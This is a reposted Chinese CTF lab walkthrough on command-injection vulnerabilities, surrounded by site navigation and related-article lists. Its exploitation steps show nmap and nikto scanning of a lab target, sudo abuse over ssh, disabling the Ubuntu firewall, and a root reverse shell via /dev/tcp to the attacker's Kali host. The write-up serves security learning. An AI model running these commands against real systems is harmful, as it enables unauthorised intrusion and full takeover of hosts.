扫码关注官方微信

扫码下载APP

返回顶部

首页 > 资讯 > 后端开发 > PHP编程 >CTF-命令执行【超详细】

847

0

分享到

CTF-命令执行【超详细】

php 安全网络 2023-08-31 16:08:23 847人浏览安东尼

摘要

前言作者简介：不知名白帽，网络安全学习者。博客主页：https://blog.csdn.net/m0_63127854?type=blog CTF-专栏：https://blog.csdn.net/m0_63127854/ca

前言

作者简介：不知名白帽，网络安全学习者。

博客主页：https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏：https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

目录

命令执行漏洞介绍

nmap -sV 192.168.20.136

访问192.168.20.136:8080

敏感信息探测

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

利用ssh协议执行root权限的命令

关闭Ubuntu中的防火墙

靶机反弹shell

命令执行漏洞介绍

当应用需要调用一些外部应用程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等，当用户可以控制命令执行函数中的参数时，将可以注入恶意命令到正常命令中，造成命令执行攻击。

调用这些函数执行系统命令的时候，如果将用户的输入作为系统命令的参数拼接到命令行中，有没有多虑用户输入的情况下，就会造成命令执行漏洞。

实验环境

kali 192.168.20.128

靶机 192.168.20.136

链接：https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q

提取码：t1x0

信息探测

nmap -sV 192.168.20.136

访问192.168.20.136:8080

发现敏感信息

敏感信息探测

nikto -host http://192.168.20.136:8080

发现/test.jsp并进行访问

进行系统命令执行

列出/tmp目录下的文件

列出/home目录下的内容

读取敏感信息

漏洞利用

利用ssh协议执行root权限的命令

ssh bill@localhost sudo -l

关闭Ubuntu中的防火墙

ssh bill@localhost sudo ufw disable

提权

监听端口

靶机反弹shell

ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1

查看flag

来源地址：https://blog.csdn.net/m0_63127854/article/details/126694788

您可能感兴趣的文档:

--结束END--

本文标题: CTF-命令执行【超详细】

本文链接: https://lsjlt.com/news/386203.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

猜你喜欢

CTF-命令执行【超详细】

前言作者简介：不知名白帽，网络安全学习者。博客主页：https://blog.csdn.net/m0_63127854type=blog CTF-专栏：https://blog.csdn.net/m0_63127854/cat...

99+

2023-08-31

php 安全网络
命令执行漏洞超详细讲解

💕💕💕 博主昵称：摆烂阳💕💕💕 🥰博主主页跳转链接 👩‍...

99+

2023-08-31

服务器网络安全
CTF命令执行及绕过技巧

前言今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列！今天开启php代码审计系列！今天内容主要是CTF中命令注入及绕过的一些技巧！以及构成RCE的一些情景！正...

99+

2024-04-02
CTF命令执行的常见姿势

命令执行的常见姿势命令执行的常见姿势 c=cat flag.php; c=tac flag.php|| c=tac=10) :比如ca${21}t a.txt表示cat a.txt 在没有传入参数的...

99+

2023-09-20

php linux
python 远程执行命令的详细代码

1.简单版 # coding: utf-8 import paramiko import re from time import sleep def ssh(): ssh ...

99+

2024-04-02
Linux命令大全(超详细版)

Linux命令大全(超详细版) 1.简单系统命令 # 查看ip地址ip aip addr# ping网络(测试网络连通)ip 目标机器的ip# 查看系统时间date# 注销logout# 关机shut...

99+

2023-09-09

linux 服务器网络 udp spring
CTFShow-WEB入门篇命令执行详细Wp(29-40)

WEB入门篇--命令执行详细Wp 命令执行：Web29：Web30：Web31：web32：web33：web34：web35：web36：web37：web38：web39：web40： ...

99+

2023-09-04

php 开发语言 Web安全 CTF 命令执行
Android执行shell命令详解

一、方法代码如下: public static synchronized String run(String[] ...

99+

2022-06-06

shell Android
计算机常用命令(超详细)

计算机常用命令有很多，下面是一些常用的命令以及它们的功能和用法：1. dir：列出当前目录下的文件和子目录。用法：dir [路径] ...

99+

2023-09-14

计算机
Java.Utils怎么执行命令行命令

小编给大家分享一下Java.Utils怎么执行命令行命令，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！常用的java框架有哪些1.SpringMVC，Spring...

99+

2023-06-14
Linux 系统 grep 命令超详细讲解

grep命令是Linux系统中非常常用的搜索命令，用于在文件中查找指定的字符串。下面是grep命令的详细讲解：基本语法：grep [...

99+

2023-09-15

Linux
Python：执行命令行指令

文章目录简介os.systemos.popensubprocess.Popen()参考文献简介在python中，调用外部命令行（linux中的shell、或者windows中的cmd...

99+

2023-09-30

python
ctfshow 命令执行

目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 web45 web46 web47 we...

99+

2023-08-31

网络安全安全 web安全
java如何执行（命令执行）

执行java文件方法：（相关视频教程推荐：java视频教程）使用环境:jdk1.6文件目录：javac *.java会生成对应的*.class文件java *.class就可以执行了，.class可以省略t.java中是没有包的public...

99+

2019-10-16

java
Linux命令行循环执行shell命令

目录linux命令行，循环执行shell命令死循环命令格式效果普通计数循环循环10次效果LLinux命令行，循环执行shell命令死循环命令格式 while true ;do <command>; don...

99+

2023-01-03

linuxshell循环执行命令循环执行shell命令 linux命令行 Linuxshell循环命令 while死循环
RCE代码及命令执行(详解)

RCE代码及命令执行 1.RCE漏洞1.1.漏洞原理1.2.漏洞产生条件1.3.漏洞挖掘1.4.漏洞分类1.4.1.命令执行1.4.1.1.漏洞原理1.4.1.2.命令执行危险函数1.4.1....

99+

2023-09-11

php web安全安全网络安全
详解Shell命令的执行顺序

详解Shell命令的执行顺序？很多新手对此不是很清楚，为了帮助大家解决这个难题，下面小编将为大家详细讲解，有这方面需求的人可以来学习下，希望你能有所收获。Shell 从标准输入或脚本中读取的每一行称为管道（pipeline）;它包含了一个或...

99+

2023-06-09
Java执行shell命令

Java执行shell命令前言一、案例场景原因解决方案二、拓展创建临时脚本，执行shell命令三、总结前言 java执行shell命令的方式有很多种，但是在应...

99+

2023-09-05

java 开发语言 linux
python paramiko 执行命令

参考http://wangwei007.blog.51cto.com/blog/68019/1058726http://youzao.blog.51cto.com/3946111/1348903在node1上想对node2执行命令，标准的答...

99+

2023-01-31

命令 python paramiko
python执行cmd命令

最典型的模块一，执行cmd并读取返回值 import subprocess p = subprocess.Popen("ls", stdout=subprocess.PIPE, universal_newl...

99+

2023-01-31

命令 python cmd

软考高级职称资格查询

热门wiki

mysql删除数据恢复

mysql删表能回滚吗

mysql找回删除的表

mysql不小心删除了表

mysql不小心把表删了怎么恢复数据

mysql数据表删除后能恢复么

mysql误删表数据恢复

mysql误删表恢复

mysql删除表怎么恢复

近期文章

【PHP小课堂】PHP中的数组函数学习（三）

LaravelORM+协程在Webman中的应用

2024最新Consul集群搭建看这篇就够了

php如何实现高并发

PHP XSS防御：构建坚固的网络安全基础

PHP XSS防范：确保你的网站安全可靠

PHP XSS预防措施：保护你的网站免受恶意攻击

PHP XSS防护：网络安全的关键

PHP XSS防御：保护你的网站免受黑客入侵

PHP XSS防范：建立牢不可破的网络安全

推荐阅读

php变量作用域是什么

2024-02-29

PHP isset按钮不起作用怎么解决

2024-02-29

php中target标签怎么使用

2024-02-29

php怎么获取网页内容

2024-02-29

php怎么实现批量发送邮件

2024-02-29

PHP方法参数传递及返回值详解

2024-02-29

PHP7下载PDF文件失败的解决方法

2024-02-29

最佳在线PHP编辑器：快速创建文件

2024-02-29

解决PHP数据库中爱好无法显示的问题

2024-02-29

PHP验证码复制粘贴问题解决方法分享

2024-02-29

热门问答

1

回答

如何调试操作系统的错误？
操作系统

2023-11-15发布

1

回答

操作系统中的I/O系统是如何实现的？
操作系统

2023-11-15发布

1

回答

如何实现操作系统的内存管理？
操作系统

2023-11-15发布

1

回答

什么是虚拟内存，它对操作系统有什么影响？
操作系统

2023-11-15发布

1

回答

ASP中的MVC架构和WebForms架构有什么区别和使用场景？
ASP.NET

2023-11-15发布

1

回答

ASP中的数据验证和数据校验有什么不同？
ASP.NET

2023-11-15发布

1

回答

ASP中的ADO对象和DAO对象有什么区别和使用方法？
ASP.NET

2023-11-15发布

1

回答

Node.js中的包管理器NPM是什么？如何使用它进行依赖管理？
node.js

2023-11-15发布

1

回答

Vue.js中的动态组件是什么？如何使用它来动态渲染组件？
VUE

2023-11-15发布

1

回答

如何使用Vue.js实现懒加载和预加载？
VUE

2023-11-15发布

编程网，编程工程师的家园，是目前国内优秀的开源技术社区之一，形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容，为IT开发者提供了一个发现、使用、并交流开源技术的平台。

官方手机版
微信公众号
商务合作

Powered by 编程网 | Copyright © 2018-2023, 版权所有. | 网站地图 | 苏ICP备17033115号